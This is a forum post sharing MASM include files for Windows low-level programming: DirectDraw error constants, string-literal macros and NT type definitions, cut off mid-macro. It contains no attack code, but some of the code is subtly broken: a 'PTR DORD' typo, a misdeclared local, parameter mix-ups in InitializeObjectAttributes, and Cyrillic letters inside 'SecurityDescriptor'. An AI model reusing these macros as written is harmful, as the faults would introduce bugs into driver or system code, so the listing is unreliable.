DDERR_NOOVERLAYHW = 088760000h+260
DDERR_NORASTEROPHW = 088760000h+280
DDERR_NOROTATIONHW = 088760000h+290
DDERR_NOSTRETCHHW = 088760000h+310
DDERR_NOT4BITCOLOR = 088760000h+316
DDERR_NOT4BITCOLORINDEX = 088760000h+317
DDERR_NOT8BITCOLOR = 088760000h+320
DDERR_NOTEXTUREHW = 088760000h+330
DDERR_NOVSYNCHW = 088760000h+335
DDERR_NOZBUFFERHW = 088760000h+340
DDERR_NOZOVERLAYHW = 088760000h+350
DDERR_OUTOFCAPS = 088760000h+360
DDERR_OUTOFVIDEOMEMORY = 088760000h+380
DDERR_OVERLAYCANTCLIP = 088760000h+382
DDERR_OVERLAYCOLORKEYONLYONEACTI = 088760000h+384
DDERR_PALETTEBUSY = 088760000h+387
DDERR_COLORKEYNOTSET = 088760000h+400
DDERR_SURFACEALREADYATTACHED = 088760000h+410
DDERR_SURFACEALREADYDEPENDENT = 088760000h+420
DDERR_SURFACEBUSY = 088760000h+430
DDERR_CANTLOCKSURFACE = 088760000h+435
DDERR_SURFACEISOBSCURED = 088760000h+440
DDERR_SURFACELOST = 088760000h+450
DDERR_SURFACENOTATTACHED = 088760000h+460
DDERR_TOOBIGHEIGHT = 088760000h+470
DDERR_TOOBIGSIZE = 088760000h+480
DDERR_TOOBIGWIDTH = 088760000h+490
DDERR_UNSUPPORTEDFORMAT = 088760000h+510
DDERR_UNSUPPORTEDMASK = 088760000h+520
DDERR_VERTICALBLANKINPROGRESS = 088760000h+537
DDERR_WASSTILLDRAWING = 088760000h+540
DDERR_XALIGN = 088760000h+560
DDERR_INVALIDDIRECTDRAWGUID = 088760000h+561
DDERR_DIRECTDRAWALREADYCREATED = 088760000h+562
DDERR_NODIRECTDRAWHW = 088760000h+563
DDERR_PRIMARYSURFACEALREADYEXIST = 088760000h+564
DDERR_NOEMULATION = 088760000h+565
DDERR_REGIONTOOSMALL = 088760000h+566
DDERR_CLIPPERISUSINGHWND = 088760000h+567
DDERR_NOCLIPPERATTACHED = 088760000h+568
DDERR_NOHWND = 088760000h+569
DDERR_HWNDSUBCLASSED = 088760000h+570
DDERR_HWNDALREADYSET = 088760000h+571
DDERR_NOPALETTEATTACHED = 088760000h+572
DDERR_NOPALETTEHW = 088760000h+573
DDERR_BLTFASTCANTCLIP = 088760000h+574
DDERR_NOBLTHW = 088760000h+575
DDERR_NODDROPSHW = 088760000h+576
DDERR_OVERLAYNOTVISIBLE = 088760000h+577
DDERR_NOOVERLAYDEST = 088760000h+578
DDERR_INVALIDPOSITION = 088760000h+579
DDERR_NOTAOVERLAYSURFACE = 088760000h+580
DDERR_EXCLUSIVEMODEALREADYSET = 088760000h+581
DDERR_NOTFLIPPABLE = 088760000h+582
DDERR_CANTDUPLICATE = 088760000h+583
DDERR_NOTLOCKED = 088760000h+584
DDERR_CANTCREATEDC = 088760000h+585
DDERR_NODC = 088760000h+586
DDERR_WRONGMODE = 088760000h+587
DDERR_IMPLICITLYCREATED = 088760000h+588
DDERR_NOTPALETTIZED = 088760000h+589
DDERR_UNSUPPORTEDMODE = 088760000h+590
DDERR_NOMIPMAPHW = 088760000h+591
DDERR_INVALIDSURFACETYPE = 088760000h+592
DDERR_NOOPTIMIZEHW = 088760000h+600
DDERR_NOTLOADED = 088760000h+601
DDERR_DCALREADYCREATED = 088760000h+620
DDERR_NONONLOCALVIDMEM = 088760000h+630
DDERR_CANTPAGELOCK = 088760000h+640
DDERR_CANTPAGEUNLOCK = 088760000h+660
DDERR_NOTPAGELOCKED = 088760000h+680
DDERR_MOREDATA = 088760000h+690
DDERR_VIDEONOTACTIVE = 088760000h+695
DDERR_DEVICEDOESNTOWNSURFACE = 088760000h+699
; ---------------------------------- END_CODE ---------------------------; [sm=aj.gif][sm=dv.gif]
[sm=aj.gif]
|
|
|
|
|
RE: BSOD - 2012-02-12 00:32:55.860000
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
Strings.mac
; ------------------- Strings.mac --------------------;
IFDEF UNICODE
IF UNICODE NE 0
STRING equ STRINGW
ELSE
STRING equ STRINGA
ENDIF
ELSE
STRING equ STRINGA
ENDIF
STRINGA MACRO _s_, a:=<1>
local txt, c, bslash, lq, sc
txt TEXTEQU <>
bslash = 0
lq = 0
sc = 0
ALIGN a
sText SUBSTR <_s_>, 2, @SizeStr(<_s_>) - 2
% FORC cha, <sText>
IF bslash
bslash = 0
IF "&cha" EQ "\"
IF sc
txt CATSTR txt, <,>
sc = 0
ENDIF
IF lq
txt CATSTR txt, <&cha>
ELSE
txt CATSTR txt, <">, <&cha>
lq = 1
ENDIF
ELSE
IF lq
txt CATSTR txt, <">
lq = 0
sc = 1
ENDIF
IF sc
txt CATSTR txt, <,>
ENDIF
IF "&cha" EQ "n"
txt CATSTR txt, <0Dh,0Ah>
ELSEIF "&cha" EQ ":" ;; \: = !
txt CATSTR txt, <21h>
ELSEIF "&cha" EQ "{" ;; \{ = (
txt CATSTR txt, <28h>
ELSEIF "&cha" EQ "}" ;; \} = )
txt CATSTR txt, <29h>
ELSEIF "&cha" EQ "[" ;; \[ = <
txt CATSTR txt, <3Ch>
ELSEIF "&cha" EQ "]" ;; \] = >
txt CATSTR txt, <3Eh>
ELSEIF "&cha" EQ "=" ;; \= = "
txt CATSTR txt, <22h>
ELSEIF "&cha" EQ "0" ;; \0 = 0
txt CATSTR txt, <0h>
ELSEIF "&cha" EQ "r" ;; \r = CR
txt CATSTR txt, <0Dh>
ELSEIF "&cha" EQ "l" ;; \l = LF
txt CATSTR txt, <0Ah>
ELSEIF "&cha" EQ "t" ;; \t = TAB
txt CATSTR txt, <9h>
ENDIF
sc = 1
ENDIF
ELSE
IF "&cha" EQ "\"
bslash = 1
ELSE
IF sc
txt CATSTR txt, <,>
sc = 0
ENDIF
IF lq
txt CATSTR txt, <&cha>
ELSE
txt CATSTR txt, <">, <&cha>
lq = 1
ENDIF
ENDIF
ENDIF
ENDM
IF lq
txt CATSTR txt, <">
ENDIF
EXITM <txt>
ENDM
STRINGW MACRO _s_, a:=<2>
local txt, c, bslash, lq, sc
txt TEXTEQU <>
bslash = 0
lq = 0
sc = 0
IF a LT 2
ALIGN 2
ELSE
ALIGN a
ENDIF
;; remove quotation marks
sText SUBSTR <_s_>, 2, @SizeStr(<_s_>) - 2
% FORC cha, <sText>
IF bslash
bslash = 0
IF "&cha" EQ "\"
IF sc
txt CATSTR txt, <,>
sc = 0
ENDIF
txt CATSTR txt, <"&cha">
sc = 1
ELSE
IF lq
txt CATSTR txt, <">
lq = 0
sc = 1
ENDIF
IF sc
txt CATSTR txt, <,>
ENDIF
IF "&cha" EQ "n" ;; \n = CR, LF
txt CATSTR txt, <0Dh,0Ah>
ELSEIF "&cha" EQ ":" ;; \: = !
txt CATSTR txt, <21h>
ELSEIF "&cha" EQ "{" ;; \{ = (
txt CATSTR txt, <28h>
ELSEIF "&cha" EQ "}" ;; \} = )
txt CATSTR txt, <29h>
ELSEIF "&cha" EQ "[" ;; \[ = <
txt CATSTR txt, <3Ch>
ELSEIF "&cha" EQ "]" ;; \] = >
txt CATSTR txt, <3Eh>
ELSEIF "&cha" EQ "=" ;; \= = "
txt CATSTR txt, <22h>
ELSEIF "&cha" EQ "0" ;; \0 = 0
txt CATSTR txt, <0>
ELSEIF "&cha" EQ "r" ;; \r = CR
txt CATSTR txt, <0Dh>
ELSEIF "&cha" EQ "l" ;; \l = LF
txt CATSTR txt, <0Ah>
ELSEIF "&cha" EQ "t" ;; \t = TAB
txt CATSTR txt, <9h>
ENDIF
sc = 1
ENDIF
ELSE
IF "&cha" EQ "\"
bslash = 1
ELSE
IF sc
txt CATSTR txt, <,>
sc = 0
ENDIF
txt CATSTR txt, <"&cha">
sc = 1
ENDIF
ENDIF
ENDM
EXITM <txt>
ENDM
TA MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln)
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
CTA MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln)
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
TW MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln)
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
CTW MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln)
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
T MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
TW txt, amnesia, iasemna
ELSE
TA txt, amnesia, iasemna
ENDIF
ELSE
TA txt, amnesia, iasemna
ENDIF
ENDM
CT MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
CTW txt, amnesia, iasemna
ELSE
CTA txt, amnesia, iasemna
ENDIF
ELSE
CTA txt, amnesia, iasemna
ENDIF
ENDM
$TA MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln)
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$CTA MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln)
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$TW MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln)
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$CTW MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln)
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$T MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
EXITM $TW(txt, amnesia, iasemna)
ELSE
EXITM $TA(txt, amnesia, iasemna)
ENDIF
ELSE
EXITM $TA(txt, amnesia, iasemna)
ENDIF
ENDM
$CT MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
EXITM $CTW(txt, amnesia, iasemna)
ELSE
EXITM $CTA(txt, amnesia, iasemna)
ENDIF
ELSE
EXITM $CTA(txt, amnesia, iasemna)
ENDIF
ENDM
TA0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln), 0
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
TW0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
T0 MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
TW0 txt, amnesia, iasemna
ELSE
TA0 txt, amnesia, iasemna
ENDIF
ELSE
TA0 txt, amnesia, iasemna
ENDIF
ENDM
CTA0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln), 0
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
CTW0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
ENDM
CT0 MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
CTW0 txt, amnesia, iasemna
ELSE
CTA0 txt, amnesia, iasemna
ENDIF
ELSE
CTA0 txt, amnesia, iasemna
ENDIF
ENDM
$TA0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln), 0
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$TW0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$T0 MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
EXITM $TW0(txt, amnesia, iasemna)
ELSE
EXITM $TA0(txt, amnesia, iasemna)
ENDIF
ELSE
EXITM $TA0(txt, amnesia, iasemna)
ENDIF
ENDM
$CTA0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <1>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d db STRINGA(<txt>, aln), 0
ELSE
ALIGN aln
d db 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$CTW0 MACRO txt, amnesia, iasemna
local d, aln, sn
sn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
d TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
d TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
d dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
d dw 0
ENDIF
@CurSeg ENDS
sn SEGMENT
EXITM <offset d>
ENDM
$CT0 MACRO txt, amnesia, iasemna
IFDEF UNICODE
IF UNICODE NE 0
EXITM $CTW0(txt, amnesia, iasemna)
ELSE
EXITM $CTA0(txt, amnesia, iasemna)
ENDIF
ELSE
EXITM $CTA0(txt, amnesia, iasemna)
ENDIF
ENDM
IFNDEF UNICODE_STRING
UNICODE_STRING STRUCT
iLength WORD ?
MaximumLength WORD ?
Buffer DWORD ?
UNICODE_STRING ENDS
PUNICODE_STRING typedef PTR UNICODE_STRING
ENDIF
COUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna
local dum, segn, us
segn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
us TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
us TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
dum dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
dum dw 0
ENDIF
ALIGN 4
us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum}
@CurSeg ENDS
segn SEGMENT
ENDM
CCOUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna
local dum, segn, us
segn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
us TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
us TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
dum dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
dum dw 0
ENDIF
ALIGN 4
us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum}
@CurSeg ENDS
segn SEGMENT
ENDM
$COUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna
local dum, segn, us
segn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
us TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
us TEXTEQU <iasemna>
ENDIF
ENDIF
.data
IF @SizeStr(<txt>)
dum dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
dum dw 0
ENDIF
ALIGN 4
us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum}
@CurSeg ENDS
segn SEGMENT
EXITM <offset us>
ENDM
$CCOUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna
local dum, segn, us
segn TEXTEQU @CurSeg
aln TEXTEQU <2>
IFNB <amnesia>
IF (OPATTR (amnesia)) AND 00000100y
;; yes -> amnesia is alignment
aln TEXTEQU %amnesia
ELSE
;; no -> amnesia is label
us TEXTEQU <amnesia>
ENDIF
ENDIF
IFNB <iasemna>
IF (OPATTR (iasemna)) AND 00000100y
;; yes -> iasemna is alignment
aln TEXTEQU %iasemna
ELSE
;; no -> iasemna is label
us TEXTEQU <iasemna>
ENDIF
ENDIF
.const
IF @SizeStr(<txt>)
dum dw STRINGW(<txt>, aln), 0
ELSE
ALIGN aln
dum dw 0
ENDIF
ALIGN 4
us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum}
@CurSeg ENDS
segn SEGMENT
EXITM <offset us>
ENDM
ntdef.inc
TRUE equ 1
FALSE equ 0
NULL equ 0
NTSTATUS typedef DWORD
CHAR typedef BYTE
PCHAR typedef PTR BYTE
UCHAR typedef BYTE
PUCHAR typedef PTR BYTE
WCHAR typedef WORD
CALLBACK typedef proto STDCALL
WINAPI typedef proto STDCALL
NTAPI typedef proto STDCALL
BOOL typedef DWORD
BOOLEAN typedef BYTE
PBOOLEAN typedef PTR BYTE
PBYTE typedef PTR BYTE
PWORD typedef PTR DORD
PDWORD typedef PTR DWORD
PVOID typedef PTR
PCVOID typedef PTR
PSTR typedef PTR BYTE
PCSTR typedef PTR BYTE
PWSTR typedef PTR WORD
PSZ typedef PTR BYTE
PCSZ typedef PTR BYTE
PDWORD_PTR typedef PTR DWORD
UINT typedef DWORD
LONG typedef SDWORD
PLONG typedef PTR SDWORD
ULONG typedef DWORD
PULONG typedef PTR DWORD
USHORT typedef WORD
USHORT typedef WORD
DOUBLE typedef QWORD
HANDLE typedef DWORD
HFILE typedef DWORD
IFNDEF UNICODE_STRING
UNICODE_STRING STRUCT
woLength WORD ?
MaximumLength WORD ?
Buffer PWSTR ?
UNICODE_STRING ENDS
PUNICODE_STRING typedef PTR UNICODE_STRING
ENDIF
_STRING STRUCT
woLength WORD ?
MaximumLength WORD ?
Buffer DWORD ?
_STRING ENDS
PSTRING typedef PTR _STRING
LARGE_INTEGER UNION
struct
LowPart DWORD ?
HighPart DWORD ?
ends
struct u
LowPart DWORD ?
HighPart DWORD ?
ends
QuadPart QWORD ?
LARGE_INTEGER ENDS
PLARGE_INTEGER typedef PTR LARGE_INTEGER
ULARGE_INTEGER UNION
struct
LowPart DWORD ?
HighPart DWORD ?
ends
struct u
LowPart DWORD ?
HighPart DWORD ?
ends
QuadPart QWORD ?
ULARGE_INTEGER ENDS
PULARGE_INTEGER typedef PTR ULARGE_INTEGER
LIST_ENTRY STRUCT
Flink DWORD ?
Blink DWORD ?
LIST_ENTRY ENDS
PLIST_ENTRY typedef PTR LIST_ENTRY
SINGLE_LIST_ENTRY STRUCT
Next DWORD ?
SINGLE_LIST_ENTRY ENDS
PSINGLE_LIST_ENTRY typedef PTR SINGLE_LIST_ENTRY
OBJ_INHERIT equ 00000002h
OBJ_PERMANENT equ 00000010h
OBJ_EXCLUSIVE equ 00000020h
OBJ_CASE_INSENSITIVE equ 00000040h
OBJ_OPENIF equ 00000080h
OBJ_OPENLINK equ 00000100h
OBJ_KERNEL_HANDLE equ 00000200h
OBJ_VALID_ATTRIBUTES equ 000003F2h
OBJECT_ATTRIBUTES STRUCT
dwLength DWORD ?
RootDirectory HANDLE ?
ObjectName PUNICODE_STRING ?
Attributes DWORD ?
SecurityDesсriрtor PVOID ?
SecurityQualityOfService PVOID ?
OBJECT_ATTRIBUTES ENDS
POBJECT_ATTRIBUTES typedef OBJECT_ATTRIBUTES
$IsAddr2 MACRO Operand:REQ
local a
a = 0
IF @SizeStr(<Operand>) GT 5
IFIDNI <addr >, @SubStr(<Operand>, 1 , 5)
a = 1
ENDIF
ENDIF
IF a
EXITM <-1>
ELSE
EXITM <0>
ENDIF
ENDM
InitializeObjectAttributes MACRO p:REQ, n:REQ, a:REQ, r:REQ, s:REQ
local adr, reax, reax
reax = 0
recx = 0
IF (OPATTR (p)) AND 00010000y
IFDIFI <p>, <ecx>
mov ecx, p
ENDIF
ELSE
IF $IsAddr2(p)
adr SUBSTR <p>, 6
IF $IsStack(adr)
lea ecx, adr
recx = 1
ELSE
mov ecx, offset adr
ENDIF
ENDIF
ENDIF
PUSHCONTEXT ASSUMES
assume ecx:ptr OBJECT_ATTRIBUTES
mov [ecx].dwLength, sizeof OBJECT_ATTRIBUTES
IF (OPATTR (r)) AND 00000010y
push r
pop [ecx].RootDirectory
ELSE
IF r EQ 0
and [ecx].RootDirectory, 0
ELSE
mov [ecx].RootDirectory, r
ENDIF
ENDIF
IF (OPATTR (a)) AND 00000010y
push a
pop [ecx].Attributes
ELSE
IF r EQ 0
and [ecx].Attributes, 0
ELSE
mov [ecx].Attributes, r
ENDIF
ENDIF
IF (OPATTR (n)) AND 00010000y
mov [ecx].ObjectName, n
ELSE
IF $IsAddr2(n)
adr SUBSTR <n>, 6
IF $IsStack(adr)
lea eax, adr
mov [ecx].ObjectName, eax
reax = 1
ELSE
mov [ecx].ObjectName, offset adr
ENDIF
ELSEIF (OPATTR (n)) AND 00000010y
push n
pop [ecx].ObjectName
ENDIF
ENDIF
IF (OPATTR (s)) AND 00000010y
push s
pop [ecx].SecurityDesсriрtor
ELSE
IF r EQ 0
and [ecx].SecurityDesсriрtor, 0
ELSE
